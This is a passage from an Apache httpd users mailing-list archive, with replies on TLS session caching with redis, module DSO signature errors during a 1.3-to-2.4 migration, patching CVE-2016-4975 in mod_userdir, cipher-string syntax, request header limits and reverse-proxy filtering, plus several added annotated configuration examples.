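    RewriteRule ^ "https://%1%{REQUEST_URI}" [R=301,L]
</VirtualHost>

<VirtualHost *:443>
    # Same name list as the :80 host, so both ports select the same pair.
    ServerName  host1.example.com
    ServerAlias host2.example.com www.host1.example.com www.host2.example.com
    SSLEngine on
    SSLCertificateFile    "/etc/httpd/ssl/hosts.crt"   # must cover every name above
    SSLCertificateKeyFile "/etc/httpd/ssl/hosts.key"
    DocumentRoot "/srv/www/html"
</VirtualHost>
```

`httpd -S` prints the resulting name-based vhost lists per ip:port, which is the quickest way to confirm that both ports show the same names before reloading.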


Re: [users@httpd] Using redis for caching Apache requests

2018-11-26 Thread William A Rowe Jr
You will have to go out of your way to disable TLS tickets. In the course of
normal operations, you won't see many cached TLS sessions at all, because
the ticket is returned to the client, and the client re-presents that ticket
to reestablish the session; no session caching required.

http://httpd.apache.org/docs/2.4/mod/mod_ssl.html#sslsessiontickets

This is preferable to the session cache, so don't leave it disabled after
testing the session cache behavior. If you are running mod_status, you
can see the cached sessions stats.


On Fri, Nov 23, 2018 at 3:51 AM Ananya Dey  wrote:

> Hi,
>
> I am trying to cache the requests coming on my Apache web server using the
> mod_socache_redis module. After loading the module, I am sending a request
> from Apache to my redis server in the following format-
> SSLSessionCache redis://localhost:4321
> 4321 is the port on which the redis server has started.
> However when I am checking the status of my redis server, there is no
> update of the apache requests. Can anyone please guide me on how to go
> about this? Particularly on how to set my request values onto the redis
> cache directly from Apache.
>
> Thanks
> Ananya
>
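An added configuration example for this edit, not from the thread: the session cache as the poster configured it, next to the ticket setting the reply says dominates it. SSLSessionCache stores TLS session state, not HTTP responses (that would be mod_cache). The redis address follows the question; the ticket key path and the status ACL are assumptions.

```apache
# Added example; the key file path and status ACL are assumptions.
LoadModule ssl_module           modules/mod_ssl.so
LoadModule socache_redis_module modules/mod_socache_redis.so
LoadModule status_module        modules/mod_status.so

# Server-side store for TLS session state. Global scope only. Provider syntax
# is provider:arguments; confirm the argument form against the
# mod_socache_redis page for your release.
SSLSessionCache        "redis:localhost:4321"
SSLSessionCacheTimeout 300

# Tickets are on by default. A client holding a ticket resumes without any
# server-side lookup, so the redis store stays nearly empty. Disable tickets
# only while verifying the cache, then delete this line again.
SSLSessionTickets off

# If tickets stay on, remember what the ticket key protects: every session
# resumed with it. mod_ssl generates a fresh random key per (re)start; a
# persistent key, which a cluster needs, must be rotated on your own schedule.
#SSLSessionTicketKeyFile "/etc/httpd/ssl/ticket.key"

# Cache hit/miss counters appear on the status page.
ExtendedStatus On
<Location "/server-status">
    SetHandler server-status
    Require ip 127.0.0.1 ::1
</Location>
```

With tickets disabled, `redis-cli -p 4321 monitor` should show SET/GET traffic from httpd on each new and resumed handshake; with tickets enabled again, that traffic all but disappears, which is the behaviour the reply describes.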


Re: [users@httpd] Graceful shutdown of apache

2018-11-26 Thread William A Rowe Jr
Graceful shutdown is a WINCH signal.

In -X mode you don't have a parent -> children relationship with httpd,
just the worker process. It isn't for normal operation.



On Thu, Nov 22, 2018 at 7:28 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I am not able to shutdown apache gracefully if I am starting apache in
> debug mode i:e (./httpd -X) with worker mpm. I am sending kill -term PID to
> httpd process. whereas the same command is working with prefork.
>
> How should I stop worker mpm if started in debug mode ?
>
>
> Thanks
> Hemant
>


Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

2018-11-14 Thread William A Rowe Jr
You are absolutely right, there is a NULL quadword at the expected position
of the module signature. How this happened is the question.

Could it be possible that you are still compiling against httpd 1.3 include
files? The ordering of the module structure has changed. If the -I include
paths are correct, this shouldn't happen, but if you have an installed very
old httpd in place in the system paths, and the compiler isn't treating the
-I include paths in priority, this would happen.




On Wed, Nov 14, 2018 at 1:48 PM  wrote:

> We have used the same compiler for both.
>
> My main concern is "expected signature 41503234 but saw **"
>
> What could be the reason of signature **?
>
> This implies that no signature is generated in my case
>
> Thanks & Regards
> Ankit Singhal
> Tata Consultancy Services
> Mailto: singhal.an...@tcs.com
> Website: http://www.tcs.com
>
>
>
>
> From:Eric Covener 
> To:users@httpd.apache.org
> Date:14-11-2018 15:58
> Subject:Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3
> to 2.0 UNIX Solaris
> --
>
>
>
> "External email. Open with Caution"
>
> Do you use a "similar" compiler for httpd and the module?
> On Wed, Nov 14, 2018 at 1:56 PM  wrote:
> >
> > Hi All,
> >
> > Thank you Rick and William for helping me out.
> >
> > As suggested I had use the apxs to build a module.
> > Steps as follows:
> >
> > 1> I have commented my module and try to start the apache and it started.
> >
> > 2> I took the default example file that comes with
> httpd-2.4.34(httpd-2.4.34/modules/examples/mod_example_hooks.c) and compile
> it with apxs by following command:
> > apxs -c mod_example_hooks.c
> >
> > 3> Above command automatically created a folder .libs and in this there
> is .so created(.libs/mod_example_hooks.so)
> >
> > 4> When I loaded the created module and try to start the apache then
> also it is giving the same error.
> >
> > quartz: /usr/local/apache2.4.34/conf/extra > apache2.4 start
> > httpd: Syntax error on line 490 of
> /usr/local/apache2.4.34/conf/httpd.conf: Syntax error on line 6 of
> /usr/local/apache2.4.34/conf/extra/httpd-quartz.conf: API module structure
> 'example_hooks_module' in file
> /app/quartz/COMS/EAI_324/ph/http/src/.libs/mod_example_hooks.so is garbled
> - expected signature 41503234 but saw  - perhaps this is not an
> Apache module DSO, or was compiled for a different Apache version?
> >
> >
> >
> > Thanks & Regards
> > Ankit Singhal
> > Tata Consultancy Services
> > Mailto: singhal.an...@tcs.com
> > Website: http://www.tcs.com
> >
> >
> >
> >
> > From:"Houser, Rick" 
> > To:"users@httpd.apache.org" 
> > Date:13-11-2018 14:40
> > Subject:RE: [users@httpd] URGENT: Apache HTTP Migration from
> 1.3 to 2.0 UNIX Solaris
> > 
> >
> >
> >
> > "External email. Open with Caution"
> >
> > While that is one approach, I'm afraid it won't speed up your exercise;
> it is most
> > direct to get 2.4 going.
> >
> >
> > Something that will likely speed your transition is to split your task
> into as small of portions as possible, and tackle those one at a time from
> a higher level perspective.  For example, if a module is doing some custom
> authentication, look at what’s available in 2.4 already and see if
> something now stock can do the job, or at least get you 90% of the way
> there and serve as an updated template for your code.  For example, there
> are already modules for authentication providers like ldap, content
> caching, database access, etc.
> >
> > The time savings on the simplified troubleshooting steps are likely to
> be far from insignificant, and you would have the benefit of a more
> standardized/modern codebase.  For example, get the server up and running
> with static content, then compile one module with apxs, get it to load,
> then work on the related config.  Work through any issues you find with

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

2018-11-13 Thread William A Rowe Jr
On Tue, Nov 13, 2018 at 11:04 AM  wrote:

>
> Our main objective is to migrate to 2.4. Since I faced an issue while
> doing so, I thought it would be better to first migrate to 2.0 then to 2.2
> and finally to 2.4.
>

While that is one approach, I'm afraid it won't speed up your exercise; it
is most direct to get 2.4 going.


> In 2.4 itself the error is same.
>
> The signature created turns out to be . I could not understand
> this part. I have gone through the internet and there is always some
> definite signature available but in my case it turned out to be 0.
>

It is not a loadable library object.  Rather than fighting with cc's flags,
review the helper utility;

  https://httpd.apache.org/docs/2.4/programs/apxs.html

This will make your life much simpler for compiling and linking loadable
modules. It retains the flags initially used for compiling httpd and
modules, so that the results are consistent.


Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.0 UNIX Solaris

2018-11-13 Thread William A Rowe Jr
On Mon, Nov 12, 2018 at 10:38 AM  wrote:
>
> I have installed and set up httpd 2.0.65 version of apache server on
Solaris 11

Speaking for most readers of this list, we wonder why... what would lead
you to such a silly act? Is this in the syllabus/exercises inflicted by a
cruel teaching assistant?

Since Apache httpd 2.0.65 was released and discontinued over five years
ago, this community discontinued help for it. You are welcome to leave your
question to be answered by a very helpful person with a long memory, but
you would be much more likely to receive help from the community if you ask
about any supported version, at least some flavor of 2.4.x, at least one
which was released this year.

We will offer you a single hint, it wouldn't be wise to try to replicate
each and every compilation flag to ensure compatibility when building a
module. That's what the apxs utility script installed alongside httpd is for.


Re: [users@httpd] Patch request for Apache 2.4.x for the CVE-2016-4975

2018-11-05 Thread William A Rowe Jr
On Mon, Nov 5, 2018 at 1:25 AM Andrew Joshwa <4andrewjosh...@gmail.com>
wrote:

> Hi,
>
> Can anyone please help me to get the patch for the CVE-2016-4975.
>

Yes, http://www.apache.org/dist/httpd/, obtain and build the latest version
of 2.4. Or if you want to avoid the TLS 1.3 enhancement, you may want to obtain
2.4.35 from http://archive.apache.org/dist/httpd/ (at minimum, 2.4.27, which
corrects shortcomings of the patch you note below.)


> I have found the below link for patch from internet.
> https://svn.apache.org/viewvc?view=revision=1772678
> However this contains many changes.
>

There were further changes. The branch of all changes you are asking for is;

https://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x-merge-http-strict/

Please let me know if we need to port all changes mentioned in above patch
> OR please let me know if specific revision can be ported to fix
> CVE-2016-4975
>

This particular CVE is easily addressed by a patch to encode the mod_userdir
inputs. Not using mod_userdir external redirects is equally simple and
similarly solves the issue. Avoiding mod_alias as well as mod_rewrite is quite
challenging.

Unfortunately this class of vulnerabilities could not be addressed in a
simple fix.

The entire patch is needed to protect the client / proxy / backend from
malicious input. We refactored the way request and response text was handled
to guard against this entire class of exploits.
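An added configuration example for this edit, not from the thread or the project's advisory: the two mod_userdir modes the reply distinguishes, side by side. The redirect target host and the home-directory layout are placeholders.

```apache
# Added example; the redirect target host and the home layout are assumptions.
LoadModule userdir_module modules/mod_userdir.so

# The mode the reply says to stay away from on builds without the fix: when
# the argument is a URL, a request for /~name is answered with an external
# redirect whose Location is assembled from the request. That is the input the
# CVE fix encodes.
#UserDir "http://people.example.org/"

# The mode that generates no redirect at all: /~name maps to a local directory.
UserDir public_html
# Never expose root's home, and disable the feature for system accounts.
UserDir disabled root
UserDir disabled daemon www-data

<Directory "/home/*/public_html">
    # Users may not override security-relevant settings via .htaccess.
    AllowOverride FileInfo Indexes
    Options Indexes SymLinksIfOwnerMatch
    Require method GET POST OPTIONS
</Directory>

# If nobody needs ~user URLs, the smallest attack surface is none at all:
#UserDir disabled
```

Removing the redirect mode takes mod_userdir out of the picture, but the reply's advice to run a release carrying the whole http-strict change set (2.4.27 or later) still stands, since that refactoring covers the other request/response paths as well.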


Re: [users@httpd] RE: Warning from users@httpd.apache.org

2018-11-03 Thread William A Rowe Jr
It is a confusing message. Your mail server is rejecting some messages sent
to you by the list server, perhaps because it detects spam, perhaps because
there was a short window the server was down/in maintenance.

On Sat, Nov 3, 2018, 08:26 Leland wrote:

> Your messages are the only ones being bounced. It's strange that I'm
> receiving the digest emails. If you think I have the problem, go ahead and
> remove me. If my system is 'bouncing' your message, why did I see this
> one??
>
> I'm receiving all other emails just fine so the problem is on your end, not
> mine. Please remedy your problem.
> Thanks for the WARNING!
>
> Regards,
>
> Leland Harrell  k...@k5gu.com
>
>
> -Original Message-
> From: users-digest-h...@httpd.apache.org
> [mailto:users-digest-h...@httpd.apache.org]
> Sent: Friday, November 02, 2018 3:59 PM
> To: k...@k5gu.com
> Subject: Warning from users@httpd.apache.org
>
> Hi! This is the ezmlm program. I'm managing the
> users-dig...@httpd.apache.org mailing list.
>
>
> Messages to you from the users-digest mailing list seem to
> have been bouncing. I've attached a copy of the first bounce
> message I received.
>
> If this message bounces too, I will send you a probe. If the probe bounces,
> I will remove your address from the users-digest mailing list,
> without further notice.
>
>
> I've kept a list of which digests from the users-digest-digest mailing list
> have bounced from your address. For each digest you missed, I have
> noted the number of the first message in the digest. I do not archive
> the digests themselves, but you may be able to get the messages
> from the main list archive.
>
> To retrieve a set of messages 123-145 (a maximum of 100 per request),
> send a short message to:
>
>
> To receive a subject and author list for the last 100 or so messages,
> send a short message to:
>
>
> Here are the digest message numbers:
>
>118101
>
> --- Enclosed is a copy of the bounce message I received.
>
> Return-Path: <>
> Received: (qmail 11330 invoked for bounce); 23 Oct 2018 17:04:55 -
> Date: 23 Oct 2018 17:04:55 -
> From: mailer-dae...@apache.org
> To: users-digest-return-1181...@httpd.apache.org
> Subject: failure notice
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>


Re: [users@httpd] unescape urlencoded

2018-10-26 Thread William A Rowe Jr
Hi Simon,

you might want to express your interest/RFE to the d...@apr.apache.org list,
since that is where the apr_* functions are maintained, and enhancement
requests are always welcome.


On Thu, Oct 25, 2018 at 8:37 PM Simon Walter  wrote:

> I see apr_escape_urlencoded, but not apr_unescape_urlencoded. Perhaps it
> is apr_unescape_url and there is some fun with the naming. Looking at
> the tests, they do not seem as rigorous. A brief look at
> encoding/apr_escape.c and I see x2c and c2x. I want to ask you all as
> the docs mention
> http://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.1 for
> apr_escape_urlencoded and not for apr_unescape_url.
>
> I want to decode form data in my own application (not a module).
>
> Best,
>
> Simon
>


Re: [users@httpd] Reverse proxy not sending certificate

2018-10-12 Thread William A Rowe Jr
A number of regressions are fixed in 2.4.35, please retest against that
version.


On Fri, Oct 12, 2018, 15:27 Schettler, Marty L. <
martin.l.schett...@leidos.com> wrote:

> My reverse proxy config doesn't work with SSL any more as I try to upgrade
> from 2.4.29 to 2.4.34.
>
> My config:
>
> SSLProxyEngine On
> SSLProxyMachineCertificateFile /path/to/server_crt_and_key.crt
> SSLProxyCACertificatePath /etc/cacerts
>
> 
>   ProxyPass https://host01:9443/p
>   ProxyPassReverse https://host01:9443/p
>   SSLVerifyClient require
> 
>
> Again, this works just fine with 2.4.29. However, in 2.4.34 I get a 502 in
> my browser "Error reading from remote server" and my httpd log file has a
> warning "AH02268: Proxy client callback: (host01:443) downstream server
> wanted client certificate but none are configured." Is this possibly
> related to PR 62232? If so, I thought it would have been fixed in 2.4.32.
>
> Any help is greatly appreciated!!
>
> Marty
>


Re: [users@httpd] Get request of large file size greater than 100KB

2018-09-28 Thread William A Rowe Jr
I've looked at the httpd and apr code, what source package were you using
which started from a default MAX_IOVEC_TO_WRITE (APR_MAX_IOVEC_SIZE?) of 6?

TIA,

Bill

On Thu, Sep 27, 2018 at 11:59 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I have solved the problem by changing MAX_IOVEC_TO_WRITE value to 6 from
> 16. Now maximum data will be 8KB*6=48KB, which is less than writev max
> limit of 52KB.
>
> Thanks
> Hemant
>
> On Thu, Sep 27, 2018 at 7:56 PM Googalar 
> wrote:
>
>> Perhaps this thread will help you out...
>>
>> https://stackoverflow.com/questions/33811543/php-and-mod-fcgid-ap-pass-brigade-failed-in-handle-request-ipc-function#
>> On Thu, Sep 27, 2018 at 1:15 AM Hemant Chaudhary
>>  wrote:
>> >
>> > Hi All,
>> >
>> > I am trying to access a large file (GET request). This is
>> working properly if size of file is less than 52KB. But size greater than
>> 52KB is giving me error 4022.
>> >
>> > I have debugged and come to know that writev function can write maximum
>> upto 52KB only. Therefore I changed the default value of
>> THRESOLD_MAX_BUFFER to 42KB so that my writev will not reach to 52KB.
>> THRESOLD_MAX_BUFFER to 42KB helps me to solve the issue for PUT request.
>> >
>> > But in get request while accessing large file, size of brigade crosses
>> 52KB. As 52KB is greater than THRESOLD_MAX_BUFFER(42KB). It is trying to
>> flush the data. But limit of writev on my OS is maximum 52KB only.
>> Therefore it is giving 4022 error.
>> >
>> > Is there any way where I can control apache so that size of brigade
>> will never cross 52KB? or any other approach/ configuration parameter can
>> be used to solve this issue ?
>> >
>> > Thanks
>> > Hemant
>>


Re: [users@httpd] Compiling 2.4.34 on linux against a non system openssl version

2018-09-19 Thread William A Rowe Jr
libcrypt has nothing to do with libcrypto/libssl of openssl. They can be
loaded in parallel. Because crypt was implemented in triple DES 156 bit,
proven to convey only 112 bits of encryption strength, that cipher is no
longer a part of openssl. But the system library for crypt'ed passwords
remains.




On Sep 18, 2018 14:51, "Matthew Goebel"  wrote:


  HHmm... okay.  The issue I'm having is that crypt() no longer seems to
exist in openssl 1.1.0, which is what apr_util is testing for, and when it
cannot find it in 1.1.0 it decides to use the 1.0.0 version
of the system libssl, so apr-util and httpd are built with 1.0.0 and
mod_ssl with 1.1.0

  Guess I will try to contact some of the sites providing httpd 2.4.x
binaries with 1.1.0 support and ask about how they are handling apr-util.

Thanks,
Matt


On Tue, Sep 18, 2018 at 2:04 PM, William A Rowe Jr 
wrote:

> On Tue, Sep 18, 2018 at 10:24 AM Matthew Goebel  wrote:
>
>> Ah, and I've been looking at httpd instead of mod_ssl.so, this does in
>> fact appear to be working... ugh... never mind me.
>>
>
> No worries, but please note that apr-util can be built linking to openssl,
> and if that optional apr_crypto_openssl module is triggered before httpd
> loads mod_ssl, it may resolve the wrong library, so you may want to get
> the appropriate -R path into the apr-util build.
>
> Also, apr-util can load one of many different keyed or relational DB
> or ldap providers, most of which have linkages to a crypto provider.
> Those may be hard-wired to load and require an older openssl, and
> you will need to rebuild the whole db/sql/ldap provider lib against
> the more modern openssl.
>
>


-- 
Matthew Goebel : goe...@emunix.emich.edu : Unix Jockey @ EMU : Hail Eris
Neo-Student, Net Lurker, Donut consumer, and procrastinating medher...
 "Always with the negative waves, Moriarty" - Oddball
 "Comfort the troubled, and trouble the comfortable." - Dietrich Bonhoeffer


Re: [users@httpd] Compiling 2.4.34 on linux against a non system openssl version

2018-09-18 Thread William A Rowe Jr
On Tue, Sep 18, 2018 at 10:24 AM Matthew Goebel  wrote:

> Ah, and I've been looking at httpd instead of mod_ssl.so, this does in
> fact appear to be working... ugh... never mind me.
>

No worries, but please note that apr-util can be built linking to openssl,
and if that optional apr_crypto_openssl module is triggered before httpd
loads mod_ssl, it may resolve the wrong library, so you may want to get
the appropriate -R path into the apr-util build.

Also, apr-util can load one of many different keyed or relational DB
or ldap providers, most of which have linkages to a crypto provider.
Those may be hard-wired to load and require an older openssl, and
you will need to rebuild the whole db/sql/ldap provider lib against
the more modern openssl.


Re: [users@httpd] Unable to set ciphers string with space separated in apache

2018-09-06 Thread William A Rowe Jr
On Wed, Sep 5, 2018 at 10:11 PM, alchemist vk 
wrote:

> Hi William,
>   Sorry for late response.. I appreciate your response.
>   Small clarification: You meant to say,  with space as delimiter, httpd
> parses will consider  space separated tokens as each individual httpd
> directives?
>

The syntax of SSL_CMD_ALL(CipherSuite, TAKE1, ...) states that only a
single token is permitted (confirmed in 2.4.current).

It will consider each token individual arguments, and only one is
permitted. Placing the space-seperated tokens within double quotes causes
httpd to treat it as a single argument to SSLCipherSuite. It still may not
work, we only "support" colon-separated lists, as documented, but pass the
string given, and the rest is up to OpenSSL.


> On Mon, Aug 27, 2018 at 7:03 PM, William A Rowe Jr 
> wrote:
>
>> A good argument for following httpd documented convention.
>>
>> If you want to continue exploring, you would want to quote the cipher
>> string, since httpd would take apart unquotes, space separated tokens as
>> different httpd directive arguments, and you surely don't want that.
>>
>> On Sat, Aug 25, 2018, 20:05 alchemist vk  wrote:
>>
>>> Hi All,
>>>
>>>   openssl standard says " The cipher list consists of one or more *cipher
>>> strings* separated by colons. Commas or spaces are also acceptable
>>> separators but colons are normally used".  But apache says "directive
>>> uses a *colon-separated* *cipher-spec* string consisting of OpenSSL
>>> cipher specifications to configure the Cipher Suite the client is permitted
>>> to negotiate in the SSL handshake phase" in https://httpd.apache.org/do
>>> cs/2.4/mod/mod_ssl.html.
>>>
>>>
>>> So, when I configured apache by separating cipher string with spaces,
>>> cipher string has no affect.  But when cipher string is configured with
>>> colons, cipher string has effect.
>>>
>>>
>>> So, please provide clarification, is there any limitation why we can’t
>>> configure cipher string by using space as delimiter in apache.
>>>
>>>
>>> PS: I am using 2.4 apache version in Linux OS.
>>>
>>> With Regards,
>>> Venkatesh
>>>
>>
>
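An added configuration example for this edit, not from the thread, showing the three spellings the reply discusses and what httpd does with each. The cipher names are ordinary OpenSSL names chosen for illustration, not a recommendation for any particular OpenSSL build.

```apache
# Added example; cipher names are illustrative.

# Documented form: exactly one argument, colon-separated.
SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305
SSLHonorCipherOrder on
SSLProtocol -all +TLSv1.2

# Rejected at startup ("httpd -t" reports that the directive takes one
# argument): SSLCipherSuite is TAKE1, so the second space-separated token is
# parsed as a second argument, not as part of the cipher list.
#SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-GCM-SHA256

# Accepted by httpd as one quoted argument and handed to OpenSSL unchanged.
# OpenSSL's own parser tolerates spaces, but httpd documents only colons, so
# the outcome is whatever your OpenSSL version makes of it.
#SSLCipherSuite "ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-GCM-SHA256"
```

Check what a string expands to before deploying it with `openssl ciphers -v '<the string>'`, and confirm what the running server actually offers with `openssl s_client -connect host:443 -cipher <name>` for a cipher you expect to be refused.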


Re: [users@httpd] Reverse Proxy trouble with mod_substitute

2018-09-05 Thread William A Rowe Jr
The proxy response input is dechunked as it is retrieved from the back end.
Any chunking to the client is introduced by httpd after filtering.

It may be that the request deflate and inflate filters have comingled a
zlib stream context?

On Tue, Sep 4, 2018, 12:43 Maarten Boekhold  wrote:

> Hi,
>
> But I did try to inflate/rewrite/deflate in my first email... It just
> didn't work. I suspect something failed because the data was chunked...
>
> Maarten
>
> On September 4, 2018 20:20:18 "Gillis J. de Nijs" 
> wrote:
>
>> Yes, it is.  You can't rewrite something that's gzipped, so you'd have to
>> unzip it first, or - like you did - never have it gzipped in the first
>> place.
>>
>> See also http://www.apachetutor.org/admin/reverseproxies where there's a
>> full reverse proxy scenario configured and explained.  It uses the same
>> technique you did, and alternatively suggests you can deflate, rewrite,
>> inflate, if you so desire.
>>
>> Regards,
>> Gillis
>>
>> On Tue, Sep 4, 2018 at 3:19 PM, Maarten Boekhold 
>> wrote:
>>
>>> Hi all,
>>>
>>> I decided to force HTTPD to remove the Accept-Encoding: gzip, deflate
>>> from the request, using:
>>>
>>> RequestHeader unset Accept-Encoding
>>>
>>> Now the response is properly processed by HTTPD. So it's likely an issue
>>> with one or both of:
>>>
>>> Content-Encoding: gzip
>>> Transfer-Encoding: chunked
>>>
>>> Is this a known limitation?
>>>
>>> Regards, Maarten
>>>
>>>
>>>
>>> On 09/04/2018 11:53 AM, Maarten Boekhold wrote:
>>>
 Hi all,

 Apache HTTPD 2.4.34 on Windows 10 downloaded from Apache Haus.

 I'm trying to move a corporate application behind a reverse proxy. In
 the process, I need to move the path this application is published on,
 eg:

 /webapp1 --> /suite/webapp1

 "webapp1" contains a specific JSP that returns an HTML page with a lot
 of JavaScript inside, which hardcodes an absolute path "/service1". I
 need to move that one as well to under the external "/suite/service1"
 path.

 The GET /webapp1/the.jsp request has the following headers:

  GET /webapp1/the.jsp HTTP/1.1
  Accept: image/gif, image/jpeg, image/pjpeg,
 application/x-ms-application, application/xaml+xml,
 application/x-ms-xbap, */*
  Referer: 
  Accept-Language: en-US
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0;
 WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; Tablet PC 2.0)
  Accept-Encoding: gzip, deflate
  Host: 
  Connection: Keep-Alive
  Cookie: JSESSIONID=24B3D3B40235B8E889A5F019081AAB41

 The response (non-proxied) has the following headers

  HTTP/1.1 200
  Strict-Transport-Security: max-age=31536000;includeSubDomains
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  Content-Type: text/html;charset=ISO-8859-1
  Transfer-Encoding: chunked
  Content-Encoding: gzip
  Vary: Accept-Encoding
  Date: Tue, 04 Sep 2018 06:52:12 GMT
  Server: 

 I've set up the following in httpd.conf:

  FilterDeclare INFLATE_HTML CONTENT_SET
  FilterProvider INFLATE_HTML INFLATE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterProtocol INFLATE_HTML change=yes
  FilterTrace INFLATE_HTML 1

  FilterDeclare DEFLATE_HTML
  FilterProvider DEFLATE_HTML DEFLATE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterProtocol DEFLATE_HTML change=yes
  FilterTrace DEFLATE_HTML 1

  FilterDeclare SUBST_HTML
  FilterProvider SUBST_HTML SUBSTITUTE "%{CONTENT_TYPE} =~
 m|^text/html|"
  FilterTrace SUBST_HTML 1

  
  FilterChain +INFLATE_HTML +SUBST_HTML +DEFLATE_HTML

  ProxyPass ${internal}/webapp1/the.jsp
  ProxyPassReverse ${internal}/webapp1/the.jsp

  Substitute s|/service1|/suite/service1|n
  

 This doesn't work. I can see the request being forwarded to the internal
 application server, which executes successfully and responds with 200,
 but something inside HTTPD doesn't work, and it ends up at the browser
 with a 504 and no data (looking at this with Fiddler).

 The HTTPD error.log file contains:


 [Tue Sep 04 10:24:41.036087 2018] [proxy:trace1] [pid 452:tid 1352]
 mod_proxy.c(766): [client 192.168.1.12:50120] AH03464: URI path
 '/suite/webapp1/the.jsp' matches proxy handler
 'proxy:https://internal/webapp1/the.jsp', referer: 
 [Tue Sep 04 10:24:41.036087 2018] [proxy:trace2] [pid 452:tid 1352]
 proxy_util.c(2106): [client 192.168.1.12:50120] https: found worker
  for /webapp1/the.jsp, referer: 
 [Tue Sep 04 10:24:41.036087 2018] [proxy:debug] [pid 452:tid 1352]
 mod_proxy.c(1246): [client 192.168.1.12:50120] AH01143: Running scheme
 

Re: [users@httpd] Large authorization header returning error 400

2018-08-29 Thread William A Rowe Jr
On Wed, Aug 29, 2018 at 3:12 AM, Audebert Bernard 
wrote:

>
> The request works fine with an Authorization header line of up to at least
> 5674 bytes but breaks with an Authorization header of more than 6178 bytes with
> the following answer:
>
> Here is an excerpt of the server-info page we have activated to ensure that
> the LimitRequestFieldSize was high enough (currently set at ~40k)
>
>
> 129: LimitRequestBody 52428800
> 130: LimitRequestFields 50
> 131: LimitRequestFieldsize 40960
> 132: LimitRequestLine 40960
>

These settings are global? Or did you restrict them to a named vhost? You
don't give enough context here.

It is too late to limit them in a vhost, because the limits are applied
during the reading of the request from network, before the host (other than
first-physical ip:port host) has been deciphered.

Move these to the global config and it should be fine.


Re: [users@httpd] Unable to set ciphers string with space separated in apache

2018-08-27 Thread William A Rowe Jr
A good argument for following httpd documented convention.

If you want to continue exploring, you would want to quote the cipher
string, since httpd would take apart unquoted, space-separated tokens as
different httpd directive arguments, and you surely don't want that.

On Sat, Aug 25, 2018, 20:05 alchemist vk  wrote:

> Hi All,
>
>   openssl standard says " The cipher list consists of one or more *cipher
> strings* separated by colons. Commas or spaces are also acceptable
> separators but colons are normally used".  But apache says "directive
> uses a *colon-separated* *cipher-spec* string consisting of OpenSSL
> cipher specifications to configure the Cipher Suite the client is permitted
> to negotiate in the SSL handshake phase" in
> https://httpd.apache.org/docs/2.4/mod/mod_ssl.html.
>
>
> So, when I configured apache by separating the cipher string with spaces,
> the cipher string had no effect.  But when the cipher string is configured with
> colons, the cipher string has effect.
>
>
> So, please provide clarification, is there any limitation why we can’t
> configure cipher string by using space as delimiter in apache.
>
>
> PS: I am using 2.4 apache version in Linux OS.
>
> With Regards,
> Venkatesh
>


Re: [users@httpd] configuring mod_proxy_ftp for client ip logging

2018-07-31 Thread William A Rowe Jr
Rereading your question, you are asking whether FTP protocol offers the
equivalent of x-forwarded-for http header.

The answer is, no, you can't accomplish what you are seeking. See
https://devcentral.f5.com/questions/how-to-insert-client-ip-address-in-tcp-profile-for-ftp-connections
and dozens of other posts asking the same question.

It's an entirely reasonable extension of FTP, which if it existed,
mod_proxy_ftp could be enhanced to support.



On Jul 25, 2018 23:34, "William A Rowe Jr"  wrote:

If I understand your question, mod_proxy_ftp does not speak ftp to the
client; only between the httpd server and backend. So the only data channel
is the one established by httpd to shuttle the data.



On Tue, Jul 24, 2018, 12:28 Harbo, Peter  wrote:

> The mod_proxy_ftp module is working fine for me using release 2.4.25 to
> send urls matching a pattern to a proftpd server running on the same
> system.  I have noticed that the source IP address in the ftpd log is the
> same as the httpd running the mod_proxy_ftp module.  Am I correct in
> assuming that neither mod_remoteip nor any other configuration options of
> httpd can cause httpd's ftp proxy module to spoof the IP address of the
> client sending the request to httpd?  Otherwise this works nicely but we
> need the correct IP addresses in the proftpd log for metrics.
>


Re: [users@httpd] configuring mod_proxy_ftp for client ip logging

2018-07-25 Thread William A Rowe Jr
If I understand your question, mod_proxy_ftp does not speak ftp to the
client; only between the httpd server and backend. So the only data channel
is the one established by httpd to shuttle the data.



On Tue, Jul 24, 2018, 12:28 Harbo, Peter  wrote:

> The mod_proxy_ftp module is working fine for me using release 2.4.25 to
> send urls matching a pattern to a proftpd server running on the same
> system.  I have noticed that the source IP address in the ftpd log is the
> same as the httpd running the mod_proxy_ftp module.  Am I correct in
> assuming that neither mod_remoteip nor any other configuration options of
> httpd can cause httpd's ftp proxy module to spoof the IP address of the
> client sending the request to httpd?  Otherwise this works nicely but we
> need the correct IP addresses in the proftpd log for metrics.
>


Re: [users@httpd] "Permissions" lost after upgrade to 2.4.33

2018-07-18 Thread William A Rowe Jr
On Mon, Jul 16, 2018 at 4:53 PM, James Moe 
wrote:

>
>   After the upgrade from v2.4.23 to v2.4.33, https requests yield error
> 403:
> Access forbidden!
> You don't have permission to access the requested directory. There is
> either no index document or the directory is read-protected.
>

Likely answered elsewhere.


> http requests yield error 400:
> Bad request!
> Your browser (or proxy) sent a request that this server could not
> understand.
>

That is straightforward, your *client*, not httpd, has been sending bad
requests. Those might have CR or LF line endings, but failed to send
both CR+LF as required by the spec. It might be sending a badly
formatted request line, or invalid request header lines. LogLevel debug
here would be your friend, or you can use wireshark to look at a request.

'HttpProtocolOptions unsafe' config option can allow some of this very
